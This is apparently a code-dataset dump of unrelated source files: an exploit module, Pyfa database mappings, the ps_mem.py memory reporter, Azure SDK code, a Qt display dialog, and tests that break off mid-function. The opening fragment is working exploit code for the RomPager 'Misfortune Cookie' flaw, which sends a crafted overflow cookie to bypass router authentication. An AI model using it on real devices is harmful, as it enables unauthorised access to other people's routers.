'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C107373883=/omg1337hax'} target = 'http://' + self.host + ":" + self.port + '/blabla' try: response = requests.get(target, headers=headers, timeout=60) if response.status_code != 404: print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code) print_warning("Device is not running RomPager") else: if 'server' in response.headers: server = response.headers.get('server') if re.search('RomPager', server) is not None: print_success("Got RomPager! Server:%s" % server) if re.search('omg1337hax', response.text) is not None: print_success("Device is vulnerable to misfortune cookie") return True else: print_failed("Test didn't pass.") print_warning("Device MAY still be vulnerable") return False else: print_failed("RomPager not detected, device is running: %s " % server) return False else: print_failed("Not running RomPager") return False except requests.exceptions.Timeout: print_error("Timeout!") except requests.exceptions.ConnectionError: print_error("No route to host") def auth_bypass(self): user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = {'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C' + str(self.number) + '=' + 'B' * self.offset + '\x00'} target = 'http://' + self.host + ":" + self.port try: response = requests.get(target, headers=headers, timeout=60) if response is not None and response.status_code <= 302: print_success("Exploit sent, please check http://%s:%s authentication should be disabled" % (self.host, self.port)) else: print_error("Exploit failed") except requests.exceptions.Timeout: print_error("Timeout!") except requests.exceptions.ConnectionError: print_error("No route to host") def do_run(self, e): # First check with the same code as in misfortune cookie scanner is_vulnerable = self.check() if self.offset is None: print_error("Please set device model by running set device id") if is_vulnerable: self.auth_bypass() else: if query_yes_no("Check indicates device is not vulnerable, would you like to try the exploit anyway?", default="no"): self.auth_bypass() def help_list(self): print_help("List all available devices") Exploit()
gpl-3.0
3,007,073,380,054,384,600
67.972727
120
0.39326
false
Ebag333/Pyfa
eos/db/gamedata/effect.py
1
2320
# =============================================================================== # Copyright (C) 2010 Diego Duclos # # This file is part of eos. # # eos is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # # eos is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with eos. If not, see <http://www.gnu.org/licenses/>. # =============================================================================== from sqlalchemy import Column, String, Integer, Boolean, Table, ForeignKey from sqlalchemy.ext.associationproxy import association_proxy from sqlalchemy.orm import mapper, synonym, relation, deferred from eos.db import gamedata_meta from eos.types import Effect, EffectInfo typeeffects_table = Table("dgmtypeeffects", gamedata_meta, Column("typeID", Integer, ForeignKey("invtypes.typeID"), primary_key=True, index=True), Column("effectID", Integer, ForeignKey("dgmeffects.effectID"), primary_key=True)) effects_table = Table("dgmeffects", gamedata_meta, Column("effectID", Integer, primary_key=True), Column("effectName", String), Column("description", String), Column("published", Boolean), Column("isAssistance", Boolean), Column("isOffensive", Boolean)) mapper(EffectInfo, effects_table, properties={"ID": synonym("effectID"), "name": synonym("effectName"), "description": deferred(effects_table.c.description)}) mapper(Effect, typeeffects_table, properties={"ID": synonym("effectID"), "info": relation(EffectInfo, lazy=False)}) Effect.name = association_proxy("info", "name") Effect.description = association_proxy("info", "description") Effect.published = association_proxy("info", "published")
gpl-3.0
-5,116,466,407,913,318,000
45.4
113
0.625
false
dwayne-randle-sr/various-snippets
centos/6/usr/local/bin/ps_mem.py
1
17569
#!/usr/bin/env python # Try to determine how much RAM is currently being used per program. # Note per _program_, not per process. So for example this script # will report RAM used by all httpd process together. In detail it reports: # sum(private RAM for program processes) + sum(Shared RAM for program processes) # The shared RAM is problematic to calculate, and this script automatically # selects the most accurate method available for your kernel. # Licence: LGPLv2 # Author: P@draigBrady.com # Source: http://www.pixelbeat.org/scripts/ps_mem.py # V1.0 06 Jul 2005 Initial release # V1.1 11 Aug 2006 root permission required for accuracy # V1.2 08 Nov 2006 Add total to output # Use KiB,MiB,... for units rather than K,M,... # V1.3 22 Nov 2006 Ignore shared col from /proc/$pid/statm for # 2.6 kernels up to and including 2.6.9. # There it represented the total file backed extent # V1.4 23 Nov 2006 Remove total from output as it's meaningless # (the shared values overlap with other programs). # Display the shared column. This extra info is # useful, especially as it overlaps between programs. # V1.5 26 Mar 2007 Remove redundant recursion from human() # V1.6 05 Jun 2007 Also report number of processes with a given name. # Patch from riccardo.murri@gmail.com # V1.7 20 Sep 2007 Use PSS from /proc/$pid/smaps if available, which # fixes some over-estimation and allows totalling. # Enumerate the PIDs directly rather than using ps, # which fixes the possible race between reading # RSS with ps, and shared memory with this program. # Also we can show non truncated command names. # V1.8 28 Sep 2007 More accurate matching for stats in /proc/$pid/smaps # as otherwise could match libraries causing a crash. # Patch from patrice.bouchand.fedora@gmail.com # V1.9 20 Feb 2008 Fix invalid values reported when PSS is available. # Reported by Andrey Borzenkov <arvidjaar@mail.ru> # V3.3 24 Jun 2014 # http://github.com/pixelb/scripts/commits/master/scripts/ps_mem.py # Notes: # # All interpreted programs where the interpreter is started # by the shell or with env, will be merged to the interpreter # (as that's what's given to exec). For e.g. all python programs # starting with "#!/usr/bin/env python" will be grouped under python. # You can change this by using the full command line but that will # have the undesirable affect of splitting up programs started with # differing parameters (for e.g. mingetty tty[1-6]). # # For 2.6 kernels up to and including 2.6.13 and later 2.4 redhat kernels # (rmap vm without smaps) it can not be accurately determined how many pages # are shared between processes in general or within a program in our case: # http://lkml.org/lkml/2005/7/6/250 # A warning is printed if overestimation is possible. # In addition for 2.6 kernels up to 2.6.9 inclusive, the shared # value in /proc/$pid/statm is the total file-backed extent of a process. # We ignore that, introducing more overestimation, again printing a warning. # Since kernel 2.6.23-rc8-mm1 PSS is available in smaps, which allows # us to calculate a more accurate value for the total RAM used by programs. # # Programs that use CLONE_VM without CLONE_THREAD are discounted by assuming # they're the only programs that have the same /proc/$PID/smaps file for # each instance. This will fail if there are multiple real instances of a # program that then use CLONE_VM without CLONE_THREAD, or if a clone changes # its memory map while we're checksumming each /proc/$PID/smaps. # # I don't take account of memory allocated for a program # by other programs. For e.g. memory used in the X server for # a program could be determined, but is not. # # FreeBSD is supported if linprocfs is mounted at /compat/linux/proc/ # FreeBSD 8.0 supports up to a level of Linux 2.6.16 import getopt import time import errno import os import sys try: # md5 module is deprecated on python 2.6 # so try the newer hashlib first import hashlib md5_new = hashlib.md5 except ImportError: import md5 md5_new = md5.new # The following exits cleanly on Ctrl-C or EPIPE # while treating other exceptions as before. def std_exceptions(etype, value, tb): sys.excepthook = sys.__excepthook__ if issubclass(etype, KeyboardInterrupt): pass elif issubclass(etype, IOError) and value.errno == errno.EPIPE: pass else: sys.__excepthook__(etype, value, tb) sys.excepthook = std_exceptions # # Define some global variables # PAGESIZE = os.sysconf("SC_PAGE_SIZE") / 1024 #KiB our_pid = os.getpid() have_pss = 0 class Proc: def __init__(self): uname = os.uname() if uname[0] == "FreeBSD": self.proc = '/compat/linux/proc' else: self.proc = '/proc' def path(self, *args): return os.path.join(self.proc, *(str(a) for a in args)) def open(self, *args): try: return open(self.path(*args)) except (IOError, OSError): val = sys.exc_info()[1] if (val.errno == errno.ENOENT or # kernel thread or process gone val.errno == errno.EPERM): raise LookupError raise proc = Proc() # # Functions # def parse_options(): try: long_options = ['split-args', 'help', 'total'] opts, args = getopt.getopt(sys.argv[1:], "shtp:w:", long_options) except getopt.GetoptError: sys.stderr.write(help()) sys.exit(3) # ps_mem.py options split_args = False pids_to_show = None watch = None only_total = False for o, a in opts: if o in ('-s', '--split-args'): split_args = True if o in ('-t', '--total'): only_total = True if o in ('-h', '--help'): sys.stdout.write(help()) sys.exit(0) if o in ('-p',): try: pids_to_show = [int(x) for x in a.split(',')] except: sys.stderr.write(help()) sys.exit(3) if o in ('-w',): try: watch = int(a) except: sys.stderr.write(help()) sys.exit(3) return (split_args, pids_to_show, watch, only_total) def help(): help_msg = 'ps_mem.py - Show process memory usage\n'\ '\n'\ '-h Show this help\n'\ '-w <N> Measure and show process memory every N seconds\n'\ '-p <pid>[,pid2,...pidN] Only show memory usage PIDs in the specified list\n' \ '-s, --split-args Show and separate by, all command line arguments\n' \ '-t, --total Show only the total value\n' return help_msg #(major,minor,release) def kernel_ver(): kv = proc.open('sys/kernel/osrelease').readline().split(".")[:3] last = len(kv) if last == 2: kv.append('0') last -= 1 while last > 0: for char in "-_": kv[last] = kv[last].split(char)[0] try: int(kv[last]) except: kv[last] = 0 last -= 1 return (int(kv[0]), int(kv[1]), int(kv[2])) #return Private,Shared #Note shared is always a subset of rss (trs is not always) def getMemStats(pid): global have_pss mem_id = pid #unique Private_lines = [] Shared_lines = [] Pss_lines = [] Rss = (int(proc.open(pid, 'statm').readline().split()[1]) * PAGESIZE) if os.path.exists(proc.path(pid, 'smaps')): #stat digester = md5_new() for line in proc.open(pid, 'smaps').readlines(): #open # Note we checksum smaps as maps is usually but # not always different for separate processes. digester.update(line.encode('latin1')) if line.startswith("Shared"): Shared_lines.append(line) elif line.startswith("Private"): Private_lines.append(line) elif line.startswith("Pss"): have_pss = 1 Pss_lines.append(line) mem_id = digester.hexdigest() Shared = sum([int(line.split()[1]) for line in Shared_lines]) Private = sum([int(line.split()[1]) for line in Private_lines]) #Note Shared + Private = Rss above #The Rss in smaps includes video card mem etc. if have_pss: pss_adjust = 0.5 # add 0.5KiB as this avg error due to trunctation Pss = sum([float(line.split()[1])+pss_adjust for line in Pss_lines]) Shared = Pss - Private elif (2,6,1) <= kernel_ver() <= (2,6,9): Shared = 0 #lots of overestimation, but what can we do? Private = Rss else: Shared = int(proc.open(pid, 'statm').readline().split()[2]) Shared *= PAGESIZE Private = Rss - Shared return (Private, Shared, mem_id) def getCmdName(pid, split_args): cmdline = proc.open(pid, 'cmdline').read().split("\0") if cmdline[-1] == '' and len(cmdline) > 1: cmdline = cmdline[:-1] path = proc.path(pid, 'exe') try: path = os.readlink(path) # Some symlink targets were seen to contain NULs on RHEL 5 at least # https://github.com/pixelb/scripts/pull/10, so take string up to NUL path = path.split('\0')[0] except OSError: val = sys.exc_info()[1] if (val.errno == errno.ENOENT or # either kernel thread or process gone val.errno == errno.EPERM): raise LookupError raise if split_args: return " ".join(cmdline) if path.endswith(" (deleted)"): path = path[:-10] if os.path.exists(path): path += " [updated]" else: #The path could be have prelink stuff so try cmdline #which might have the full path present. This helped for: #/usr/libexec/notification-area-applet.#prelink#.fX7LCT (deleted) if os.path.exists(cmdline[0]): path = cmdline[0] + " [updated]" else: path += " [deleted]" exe = os.path.basename(path) cmd = proc.open(pid, 'status').readline()[6:-1] if exe.startswith(cmd): cmd = exe #show non truncated version #Note because we show the non truncated name #one can have separated programs as follows: #584.0 KiB + 1.0 MiB = 1.6 MiB mozilla-thunder (exe -> bash) # 56.0 MiB + 22.2 MiB = 78.2 MiB mozilla-thunderbird-bin return cmd #The following matches "du -h" output #see also human.py def human(num, power="Ki"): powers = ["Ki", "Mi", "Gi", "Ti"] while num >= 1000: #4 digits num /= 1024.0 power = powers[powers.index(power)+1] return "%.1f %s" % (num, power) def cmd_with_count(cmd, count): if count > 1: return "%s (%u)" % (cmd, count) else: return cmd #Warn of possible inaccuracies #2 = accurate & can total #1 = accurate only considering each process in isolation #0 = some shared mem not reported #-1= all shared mem not reported def shared_val_accuracy(): """http://wiki.apache.org/spamassassin/TopSharedMemoryBug""" kv = kernel_ver() if kv[:2] == (2,4): if proc.open('meminfo').read().find("Inact_") == -1: return 1 return 0 elif kv[:2] == (2,6): pid = os.getpid() if os.path.exists(proc.path(pid, 'smaps')): if proc.open(pid, 'smaps').read().find("Pss:")!=-1: return 2 else: return 1 if (2,6,1) <= kv <= (2,6,9): return -1 return 0 elif kv[0] > 2: return 2 else: return 1 def show_shared_val_accuracy( possible_inacc, only_total=False ): level = ("Warning","Error")[only_total] if possible_inacc == -1: sys.stderr.write( "%s: Shared memory is not reported by this system.\n" % level ) sys.stderr.write( "Values reported will be too large, and totals are not reported\n" ) elif possible_inacc == 0: sys.stderr.write( "%s: Shared memory is not reported accurately by this system.\n" % level ) sys.stderr.write( "Values reported could be too large, and totals are not reported\n" ) elif possible_inacc == 1: sys.stderr.write( "%s: Shared memory is slightly over-estimated by this system\n" "for each program, so totals are not reported.\n" % level ) sys.stderr.close() if only_total and possible_inacc != 2: sys.exit(1) def get_memory_usage( pids_to_show, split_args, include_self=False, only_self=False ): cmds = {} shareds = {} mem_ids = {} count = {} for pid in os.listdir(proc.path('')): if not pid.isdigit(): continue pid = int(pid) # Some filters if only_self and pid != our_pid: continue if pid == our_pid and not include_self: continue if pids_to_show is not None and pid not in pids_to_show: continue try: cmd = getCmdName(pid, split_args) except LookupError: #operation not permitted #kernel threads don't have exe links or #process gone continue try: private, shared, mem_id = getMemStats(pid) except RuntimeError: continue #process gone if shareds.get(cmd): if have_pss: #add shared portion of PSS together shareds[cmd] += shared elif shareds[cmd] < shared: #just take largest shared val shareds[cmd] = shared else: shareds[cmd] = shared cmds[cmd] = cmds.setdefault(cmd, 0) + private if cmd in count: count[cmd] += 1 else: count[cmd] = 1 mem_ids.setdefault(cmd, {}).update({mem_id:None}) #Add shared mem for each program total = 0 for cmd in cmds: cmd_count = count[cmd] if len(mem_ids[cmd]) == 1 and cmd_count > 1: # Assume this program is using CLONE_VM without CLONE_THREAD # so only account for one of the processes cmds[cmd] /= cmd_count if have_pss: shareds[cmd] /= cmd_count cmds[cmd] = cmds[cmd] + shareds[cmd] total += cmds[cmd] #valid if PSS available sorted_cmds = sorted(cmds.items(), key=lambda x:x[1]) sorted_cmds = [x for x in sorted_cmds if x[1]] return sorted_cmds, shareds, count, total def print_header(): sys.stdout.write(" Private + Shared = RAM used\tProgram\n\n") def print_memory_usage(sorted_cmds, shareds, count, total): for cmd in sorted_cmds: sys.stdout.write("%8sB + %8sB = %8sB\t%s\n" % (human(cmd[1]-shareds[cmd[0]]), human(shareds[cmd[0]]), human(cmd[1]), cmd_with_count(cmd[0], count[cmd[0]]))) if have_pss: sys.stdout.write("%s\n%s%8sB\n%s\n" % ("-" * 33, " " * 24, human(total), "=" * 33)) def verify_environment(): if os.geteuid() != 0: sys.stderr.write("Sorry, root permission required.\n") if __name__ == '__main__': sys.stderr.close() sys.exit(1) try: kv = kernel_ver() except (IOError, OSError): val = sys.exc_info()[1] if val.errno == errno.ENOENT: sys.stderr.write( "Couldn't access " + proc.path('') + "\n" "Only GNU/Linux and FreeBSD (with linprocfs) are supported\n") sys.exit(2) else: raise if __name__ == '__main__': verify_environment() split_args, pids_to_show, watch, only_total = parse_options() if not only_total: print_header() if watch is not None: try: sorted_cmds = True while sorted_cmds: sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args ) if only_total and have_pss: sys.stdout.write(human(total).replace(' ','')+'B\n') elif not only_total: print_memory_usage(sorted_cmds, shareds, count, total) time.sleep(watch) else: sys.stdout.write('Process does not exist anymore.\n') except KeyboardInterrupt: pass else: # This is the default behavior sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args ) if only_total and have_pss: sys.stdout.write(human(total).replace(' ','')+'B\n') elif not only_total: print_memory_usage(sorted_cmds, shareds, count, total) # We must close explicitly, so that any EPIPE exception # is handled by our excepthook, rather than the default # one which is reenabled after this script finishes. sys.stdout.close() vm_accuracy = shared_val_accuracy() show_shared_val_accuracy( vm_accuracy, only_total )
gpl-3.0
-8,928,246,836,031,157,000
34.855102
97
0.575047
false
Azure/azure-sdk-for-python
sdk/testbase/azure-mgmt-testbase/azure/mgmt/testbase/aio/operations/_test_summaries_operations.py
1
9021
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar import warnings from azure.core.async_paging import AsyncItemPaged, AsyncList from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest from azure.mgmt.core.exceptions import ARMErrorFormat from ... import models as _models T = TypeVar('T') ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] class TestSummariesOperations: """TestSummariesOperations async operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~test_base.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = _models def __init__(self, client, config, serializer, deserializer) -> None: self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config def list( self, resource_group_name: str, test_base_account_name: str, **kwargs: Any ) -> AsyncIterable["_models.TestSummaryListResult"]: """Lists the Test Summaries of all the packages under a Test Base Account. :param resource_group_name: The name of the resource group that contains the resource. :type resource_group_name: str :param test_base_account_name: The resource name of the Test Base Account. :type test_base_account_name: str :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either TestSummaryListResult or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~test_base.models.TestSummaryListResult] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.TestSummaryListResult"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) api_version = "2020-12-16-preview" accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list.metadata['url'] # type: ignore path_format_arguments = { 'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'), 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'testBaseAccountName': self._serialize.url("test_base_account_name", test_base_account_name, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('TestSummaryListResult', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response) map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TestBase/testBaseAccounts/{testBaseAccountName}/testSummaries'} # type: ignore async def get( self, resource_group_name: str, test_base_account_name: str, test_summary_name: str, **kwargs: Any ) -> "_models.TestSummaryResource": """Gets a Test Summary with specific name from all the Test Summaries of all the packages under a Test Base Account. :param resource_group_name: The name of the resource group that contains the resource. :type resource_group_name: str :param test_base_account_name: The resource name of the Test Base Account. :type test_base_account_name: str :param test_summary_name: The name of the Test Summary. :type test_summary_name: str :keyword callable cls: A custom type or function that will be passed the direct response :return: TestSummaryResource, or the result of cls(response) :rtype: ~test_base.models.TestSummaryResource :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.TestSummaryResource"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) api_version = "2020-12-16-preview" accept = "application/json" # Construct URL url = self.get.metadata['url'] # type: ignore path_format_arguments = { 'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'), 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'testBaseAccountName': self._serialize.url("test_base_account_name", test_base_account_name, 'str'), 'testSummaryName': self._serialize.url("test_summary_name", test_summary_name, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.get(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('TestSummaryResource', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TestBase/testBaseAccounts/{testBaseAccountName}/testSummaries/{testSummaryName}'} # type: ignore
mit
-5,264,327,462,107,151,000
48.839779
212
0.652478
false
RalfJung/lilass
qt_frontend.py
1
7267
# DSL - easy Display Setup for Laptops # Copyright (C) 2012-2015 Ralf Jung <post@ralfj.de> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import sys, os from screen import RelativeScreenPosition, ScreenSetup try: # Be fine with PyQt4 not being installed from PyQt5 import QtCore, QtWidgets, uic class PositionSelection(QtWidgets.QDialog): def __init__(self, situation): # set up main window super(PositionSelection, self).__init__() self._situation = situation uifile = os.path.join(os.path.dirname(__file__), 'qt_dialogue.ui') uic.loadUi(uifile, self) # fill relative position box for pos in RelativeScreenPosition: self.relPos.addItem(pos.text, pos) # keep resolutions in sync when in mirror mode def syncIfMirror(source, target): def _slot(idx): if self.isMirror: target.setCurrentIndex(idx) source.currentIndexChanged.connect(_slot) syncIfMirror(self.intRes, self.extRes) syncIfMirror(self.extRes, self.intRes) # if situation has a previousSetup, use its values as initial state if situation.previousSetup: p = situation.previousSetup self.intEnabled.setChecked(p.intResolution is not None) self.extEnabled.setChecked(p.extResolution is not None) if p.relPosition: self.relPos.setCurrentIndex(p.relPosition.value - 1) if p.extIsPrimary: self.extPrimary.setChecked(True) else: self.intPrimary.setChecked(True) # Pre-select the previous resolution self._intDefaultRes = p.intResolution self._extDefaultRes = p.extResolution self._mirrorDefaultRes = p.intResolution if p.relPosition == RelativeScreenPosition.MIRROR else None # in case of a mirror, they would be the same anyway else: self._intDefaultRes = situation.internalConnector.getPreferredResolution() self._extDefaultRes = situation.externalConnector.getPreferredResolution() self._mirrorDefaultRes = None # connect the update function self.intEnabled.toggled.connect(self.updateEnabledControls) self.extEnabled.toggled.connect(self.updateEnabledControls) self.relPos.currentIndexChanged.connect(self.updateEnabledControls) # make sure we are in a correct state self.updateEnabledControls() def getRelativeScreenPosition(self): idx = self.relPos.currentIndex() return self.relPos.itemData(idx) def fillResolutionBox(self, box, resolutions, select = None): # if the count did not change, update in-place (this avoids flicker) if box.count() == len(resolutions): for idx, res in enumerate(resolutions): box.setItemText(idx, str(res)) box.setItemData(idx, res) if res == select: box.setCurrentIndex(idx) else: # first clear it while box.count() > 0: box.removeItem(0) # then fill it for res in resolutions: box.addItem(str(res), res) if res == select: box.setCurrentIndex(box.count() - 1) # select the most recently added one def updateEnabledControls(self): intEnabled = self.intEnabled.isChecked() extEnabled = self.extEnabled.isChecked() bothEnabled = intEnabled and extEnabled self.isMirror = bothEnabled and self.getRelativeScreenPosition() == RelativeScreenPosition.MIRROR # only if both are enabled, we can really mirror # configure screen controls self.intRes.setEnabled(intEnabled) self.intPrimary.setEnabled(intEnabled and not self.isMirror) self.extRes.setEnabled(extEnabled) self.extPrimary.setEnabled(extEnabled and not self.isMirror) if not intEnabled and extEnabled: self.extPrimary.setChecked(True) elif not extEnabled and intEnabled: self.intPrimary.setChecked(True) # which resolutions do we offer? if self.isMirror: commonRes = self._situation.commonResolutions() self.fillResolutionBox(self.intRes, commonRes, select = self._mirrorDefaultRes) self.fillResolutionBox(self.extRes, commonRes, select = self._mirrorDefaultRes) self.intRes.setCurrentIndex(self.extRes.currentIndex()) else: self.fillResolutionBox(self.intRes, self._situation.internalConnector.getResolutionList(), select = self._intDefaultRes) self.fillResolutionBox(self.extRes, self._situation.externalConnector.getResolutionList(), select = self._extDefaultRes) # configure position control self.posGroup.setEnabled(bothEnabled) self.posLabel1.setEnabled(bothEnabled) self.posLabel2.setEnabled(bothEnabled) self.relPos.setEnabled(bothEnabled) # avoid having no screen self.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(intEnabled or extEnabled) def run(self): self.exec_() if not self.result(): return None intRes = self.intRes.itemData(self.intRes.currentIndex()) if self.intEnabled.isChecked() else None extRes = self.extRes.itemData(self.extRes.currentIndex()) if self.extEnabled.isChecked() else None return ScreenSetup(intRes, extRes, self.getRelativeScreenPosition(), self.extPrimary.isChecked()) except ImportError: pass # Qt frontend class QtFrontend: def __init__(self): from PyQt5 import QtWidgets self.app = QtWidgets.QApplication(sys.argv) print("Qt loaded") def error(self, message): from PyQt5 import QtWidgets QtWidgets.QMessageBox.critical(None, 'Fatal error', message) def setup(self, situation): return PositionSelection(situation).run() @staticmethod def isAvailable(): try: import PyQt5 return True except ImportError: return False
gpl-2.0
-1,890,211,412,476,436,700
45.583333
169
0.624329
false
RulersOfAsgard/ALAMO-worker
alamo_worker/plugins/tests/test_evaluate.py
1
14081
# -*- coding: utf-8 -*- from collections import OrderedDict from unittest.case import TestCase from unittest import mock from alamo_common.test.utils import override_settings from alamo_worker.plugins.druid import DruidResult from alamo_worker.plugins.evaluate import ResultEvaluator from alamo_worker.plugins.http_check import HttpResult from alamo_worker.plugins.graphite import GraphiteResult from alamo_worker.plugins.prometheus import PrometheusResult from alamo_worker.plugins.mixins import ( RESULT_OK, RESULT_FAILED, RESULT_UNKNOWN, ) class TestResultEvaluator(TestCase): @staticmethod def get_payload(rule): return { 'id': 2206299, 'triggers': [ { 'rule': rule, 'url': 'http://some.url', }], } @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluation_for_unknown_status(self, stats): rule = 'check_name.values < 200' plugin_results = [ # unknown status GraphiteResult('check_name', {}, env='test') ] evaluator = ResultEvaluator() payload = self.get_payload(rule) payload['unknown_as_failure'] = True result = evaluator.evaluate(payload, plugin_results) expected = { 'status': RESULT_FAILED, 'message': ('Metric not found in `check_name` source, ' 'check your query'), 'hysteresis': RESULT_OK } self.assertEqual(result['triggers'][0]['result'], expected) @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluate_passing_rule(self, stats): rule = 'check_name.status_code != 200' plugin_results = [ HttpResult('check_name', 200) ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected = { 'status': RESULT_OK, 'message': '', 'hysteresis': RESULT_OK, 'http_response_body': '', } self.assertEqual(result['triggers'][0]['result'], expected) @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluate_failing_rule(self, stats): rule = 'check_name.status_code != 200' plugin_results = [ HttpResult('check_name', 404) ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) msg = 'Check failed for rule `{}` which evaluates to `True`'.format( rule) expected = { 'status': RESULT_FAILED, 'message': msg, 'hysteresis': RESULT_OK, 'http_response_body': '', } self.assertEqual(result['triggers'][0]['result'], expected) @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluate_multiple_successful_results(self, stats): rule = 'check1.status_code != 200 AND check2.status_code != 200' plugin_results = [ HttpResult('check1', 200, status=RESULT_UNKNOWN), HttpResult('check2', 200, status=RESULT_OK), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) expected = { 'status': RESULT_UNKNOWN, 'message': '', 'hysteresis': RESULT_OK, 'http_response_body': '', } self.assertEqual(result['triggers'][0]['result'], expected) @override_settings(FAIL_ON_UNKNOWN=False) @mock.patch('alamo_worker.plugins.evaluate.aiostats') def test_evaluate_multiple_failed_results(self, stats): rule = 'check1.status_code != 200 AND check2.status_code != 200' plugin_results = [ HttpResult('check1', 404, status=RESULT_UNKNOWN), HttpResult('check2', 404, status=RESULT_OK), ] evaluator = ResultEvaluator() result = evaluator.evaluate(self.get_payload(rule), plugin_results) msg = 'Check failed for rule `check1.status_code != 200` '\ 'which evaluates to `True`, Check failed for rule '\ '`check2.status_code != 200` which evaluates to `True`' expected = { 'status': RESULT_FAILED, 'message': msg, 'hysteresis': RESULT_OK, 'http_response_body': '', } self.assertEqual(result['triggers'][0]['result'], expected) @override_settings(FAIL_ON_UNKNOWN=True) @mock.patch('alamo_worker.plugins.evaluate.aiostats') def 